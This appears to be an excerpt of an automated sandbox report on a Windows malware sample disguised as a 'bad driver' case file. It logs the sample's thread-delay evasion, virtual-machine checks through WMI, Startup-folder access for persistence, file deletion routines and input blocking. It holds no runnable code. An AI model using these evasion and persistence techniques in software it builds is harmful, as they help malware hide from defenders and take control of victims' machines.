Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598308	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598033	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597634	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597428	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597205	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595354	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595074	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594943	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594805	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591110	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1952	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 4375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 6891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 2924	Jump to behavior

Source: C:\Users\user\AppData\Local\directory\name.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes			graph_0-100531

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	API coverage: 4.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 6.2 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C14696 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00C14696
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_00C1C9C7
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1C93C FindFirstFileW,FindClose,	0_2_00C1C93C
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C1F200
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00C1F35D
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C1F65E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C13A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C13A2B
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C13D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00C13D4E
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	Code function: 0_2_00C1BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_00C1BF27
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A24696 GetFileAttributesW,FindFirstFileW,FindClose,	8_2_00A24696
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	8_2_00A2C9C7
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2C93C FindFirstFileW,FindClose,	8_2_00A2C93C
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00A2F200
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00A2F35D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00A2F65E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A23A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00A23A2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A23D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_00A23D4E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00A2BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	8_2_00A2BF27

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00BB4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00BB4AFE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599313	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598969	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597400	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596995	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596865	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596722	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596600	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596447	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596341	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596221	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596089	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599891	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599778	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598308	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598033	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597907	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597634	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597428	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597205	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596782	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595354	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595074	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594943	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594805	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594563	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594438	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 592110	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591985	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591860	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591735	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591610	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591485	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591360	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591235	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 591110	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior

Source: RegSvcs.exe, 0000000B.00000002.3478580853.00000000053E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
Source: RegSvcs.exe, 0000000F.00000002.3846760506.0000000005723000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: wscript.exe, 0000000D.00000002.3438134226.000001D482816000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B)

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	API call chain: ExitProcess graph end node	graph_0-98698
Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe	API call chain: ExitProcess graph end node	graph_0-98764
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

Code function: 0_2_00C241FD BlockInput,

0_2_00C241FD

Source: C:\Users\user\Desktop\Case_Your company bad driver Vehicle No.exe

